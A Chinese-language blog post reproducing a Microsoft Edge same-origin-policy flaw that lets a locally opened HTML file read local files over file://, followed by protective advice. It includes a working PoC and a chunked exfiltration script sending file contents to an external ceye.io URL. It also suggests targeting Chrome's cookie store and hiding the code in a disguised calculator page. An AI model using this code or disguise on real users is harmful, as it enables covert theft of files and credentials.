Microsoft Edge同源策略不嚴導致任意文件讀取測試

edge.png
edge.png

漏洞介紹

近期看到文章介紹,稱Microsoft Edge對SOP同源策略處理存在問題,可導致任意文件泄露。
SOP同源策略是比較常見的,簡單來說,在訪問A域名時,如果B域名站點存在JS動作通過XHR請求了A域名網站下資源,該動作會被同源策略拒絕,因為它們非同源。
同源的判定標準是一個三元組,任意一個不同則判定不同源:協議、主機名、端口號

在瀏覽器中,可以使用file://協議來讀取文件,攻擊者如果想要讀取到訪問者的本地文件,由于http和file協議不同,不同源的情況下并不能做到。
但是這個限制在特定場景下就不存在了,如果惡意頁面是保存在本地的文件,通過瀏覽器打開html文件,URL中協議就是file://,此時如果頁面中存在XHR請求file://協議,該請求是符合同源要求的,可能導致本地文件讀取。

復現測試

0x01 準備工作

嘗試讀取的本地文件:

txt.png
txt.png

poc代碼:

<html>    
<head>     
</head>    
<body>        
<div id="result"></div>
</body>
<script>    
let resultDiv = document.getElementById("result");    
    let xhr= new XMLHttpRequest();       
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= ()=> {    
     if(xhr.readyState==4) {    
     resultDiv.innerText = xhr.responseText;    
     }    
    }    
    xhr.send();    
</script>      
</html>
0x02 非Microsoft Edge瀏覽器測試

Chrome瀏覽器:提示同源策略請求只支持http,data,chrome,chrome-extension,https協議


chrome.png
chrome.png

fireforx瀏覽器:提示同源策略進制讀取,CORS只能是http協議


firefox.png
firefox.png

ie11瀏覽器:提示拒絕訪問


ie.png
ie.png
0x03 Microsoft Edge瀏覽器測試

看到的文章中測試版本是Microsoft Edge 40.15063.0.0,這里測試使用的是比它更新的版本:

version.png
version.png

測試結果是:沒有觸發錯誤攔截信息,能夠直接獲取到本地文件內容:

edge1.png
edge1.png

相關拓展

0x01 任意數據外帶

在測試中是僅僅對一個txt文件內容進行了讀取,并將內容展示在頁面中。

還可以讀取其他瀏覽器存儲的一些cookie信息,如:
Chrome的cookie信息一般在

C:/Users/${user}/AppData/Local/Google/Chrome/User Data/Default/Cookies
cookie.png
cookie.png

攻擊者如果想要通過惡意頁面,將本地的數據帶出,也是輕而易舉的。比如,可以在js中創建img標簽,發起http請求攻擊者的服務器,并且攜帶讀取到的文件內容。

如果文件內容過長,get請求的URL會超長,還能對文件內容進行分割、間隔多次傳輸;
如果文件內容不僅是文本文字,或是圖片等,還能通過各種編碼進行包裝傳輸(如encodeURI):

let resultDiv = document.getElementById("result");
    let data = "";    
    let xhr= new XMLHttpRequest();    
    let limit = 1024
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= function () {    
        if(xhr.readyState==4) {    
            resultDiv.innerText = xhr.responseText;
            url =  "http://XXXXX.ceye.io/data/?data=";   
            // data = window.btoa(xhr.responseText);  
            data = encodeURI(xhr.responseText);  
            console.log(data.length)
            let st=setInterval(function(){
                img = document.createElement("img");
                if (data.length <= limit) {
                    if (data.length == 0) {
                        clearInterval(st)
                    }else {
                        img.src = url + data;
                        resultDiv.appendChild(img);
                        clearInterval(st)
                        console.log("A:"+data.length)
                    }
                } else {
                    temp = data.substr(0, limit);
                    data = data.substr(limit,data.length-1);
                    img.src = url + temp;
                    resultDiv.appendChild(img);
                    console.log("B:"+temp.length)
                } 
            },1000)
        }    
    }    
    xhr.send();
image.png
image.png

攻擊者接收的數據段之一:

image1.png
image1.png
0x02 隱藏偽裝

造成任意文件內容泄露的JS代碼本體并不大,可以隱藏在其他正常的下載頁面中,在用戶疏于防范的情況下隱蔽地執行;
結合社會工程等手段,可以更輕易地進行攻擊利用。
例如,當下載一個用于學習html的網頁,作者建議使用Microsoft Edge進行打開,你很可能會聽從作者建議就運行查看效果

dir.png
dir.png
calc.png
calc.png

當頁面功能顯示正常,是一個計算器的網頁,警惕心就沒有了。
當你可能還沉浸在玩耍它的計算功能和學習源碼的過程中時,攻擊者想要的你本地文件內容可能已經被偷偷傳走了

res.png
res.png

防護建議

1、不要隨意打開不能確定是否存在危害的文件,包括html文件(先看一遍源代碼)
2、使用解決了該問題的更新版本的Microsoft Edge
3、使用Chrome或者Firefox等瀏覽器

?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 228,333評論 6 531
  • 序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 98,491評論 3 416
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 176,263評論 0 374
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 62,946評論 1 309
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 71,708評論 6 410
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 55,186評論 1 324
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,255評論 3 441
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,409評論 0 288
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 48,939評論 1 335
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 40,774評論 3 354
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 42,976評論 1 369
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,518評論 5 359
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,209評論 3 347
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,641評論 0 26
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 35,872評論 1 286
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 51,650評論 3 391
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 47,958評論 2 373

推薦閱讀更多精彩內容

  • 第一部分 HTML&CSS整理答案 1. 什么是HTML5? 答:HTML5是最新的HTML標準。 注意:講述HT...
    kismetajun閱讀 27,559評論 1 45
  • 2018web前端最新面試題總結 一、Html/Css基礎模塊 基礎部分 什么是HTML?答:? HTML并不是...
    duans_閱讀 4,677評論 3 27
  • 問答題47 /72 常見瀏覽器兼容性問題與解決方案? 參考答案 (1)瀏覽器兼容問題一:不同瀏覽器的標簽默認的外補...
    _Yfling閱讀 13,776評論 1 92
  • 各位好,我是來自太原市的一名在校高校生。 本應該柳綠花紅,艷陽高照的4月天,今天卻顯得格外沉悶,準確來說是昨晚下了...
    EasyChill閱讀 316評論 0 0
  • 網絡三期 焦作翟沖【原創】分享第467天 2018.04.11 昨天晚上與幾位伙伴約練,自己很榮幸當了一次...
    春暖花開zc閱讀 98評論 0 1